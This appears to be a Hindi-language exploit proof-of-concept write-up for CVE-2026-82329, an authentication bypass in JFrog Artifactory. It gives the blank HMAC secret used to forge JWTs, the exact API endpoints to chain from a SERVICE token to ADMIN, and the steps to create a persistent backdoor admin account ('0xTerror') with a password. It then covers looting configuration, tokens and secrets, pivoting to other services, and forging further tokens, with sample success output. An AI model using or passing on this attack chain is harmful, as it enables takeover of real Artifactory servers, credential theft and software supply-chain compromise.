
CVE-2026-82329 के लिए एक्सप्लॉइट PoC, JFrog Artifactory में एक प्रमाणीकरण बायपास। JWT टोकन जाली बनाकर एडमिन एक्सेस प्राप्त करने और एक स्थायी बैकडोर उपयोगकर्ता बनाने का प्रदर्शन करता है।
CVE-2026-82329 — JFrog Artifactory प्रमाणीकरण बाईपास
भेद्यता
JFrog Artifactory (संस्करण 7.111.20, 7.117.27, 7.125.19, 7.133.28, 7.146.37, 7.161.19) में गंभीर प्रमाणीकरण बाईपास। यह दोष एक अप्रमाणित हमलावर को खाली HMAC गुप्त कुंजी (0x20 के 32 बाइट्स) का उपयोग करके JWT जाली बनाने, एडमिन टोकन जारी करने और बैकडोर उपयोगकर्ता बनाने की अनुमति देता है।
शोषण श्रृंखला
चरण क्रिया 1 alg=HS256, kid=SHA256(""), skip_node_registration=true के साथ JWT जाली बनाएं 2 JWT को /access/api/v1/registry/join पर भेजें → SERVICE टोकन प्राप्त करें 3 /access/api/v1/tokens के माध्यम से SERVICE टोकन को ADMIN टोकन में बदलें 4 /artifactory/api/system/configuration, /access/api/v1/tokens, /artifactory/api/system/version के माध्यम से एडमिन पहुंच सत्यापित करें 5 /artifactory/api/security/users/{user} के माध्यम से स्थायी एडमिन उपयोगकर्ता बनाएं 6 कॉन्फ़िग, टोकन, उपयोगकर्ता, रिपॉजिटरी, रहस्य लूटें 7 उच्च-मूल्य वाले विषयों के लिए टोकन जाली बनाएं
हमले का प्रवाह
BLANK_SECRET = b"\x20" * 32
↓
JWT जाली बनाएं (HS256, kid=hashlib.sha256(""))
↓
POST /access/api/v1/registry/join
↓
SERVICE टोकन (scp=admin)
↓
POST /access/api/v1/tokens
↓
ADMIN टोकन (scp=applied-permissions/admin, aud=*)
↓
एडमिन साबित करें (GET /artifactory/api/system/configuration → 200)
↓
PUT /artifactory/api/security/users/0xTerror
↓
स्थायी एडमिन उपयोगकर्ता: 0xTerror:Terrorp0c!7777
↓
लूट: कॉन्फ़िग, टोकन, उपयोगकर्ता, रिपॉजिटरी, रहस्य
↓
पिवट जांच: Xray, Mission Control, Distribution, आदि।
↓
उच्च-मूल्य वाले विषयों के लिए टोकन जाली बनाएं
PoC आउटपुट उदाहरण
[+] चरण 1 /registry/join -> HTTP 201 SERVICE टोकन (scp=admin)
[+] चरण 2 /access/api/v1/tokens -> HTTP 200 ADMIN टोकन (scp=applied-permissions/admin)
[+] चरण 3 एडमिन का प्रमाण: config=200, tokens=200, version=200
[+] चरण 4 एडमिन उपयोगकर्ता '0xTerror' बनाएं -> HTTP 201
[=] भेद्य — अप्रमाणित हमलावर ने ADMIN प्राप्त किया
एडमिन उपयोगकर्ता: 0xTerror:Terrorp0c!7777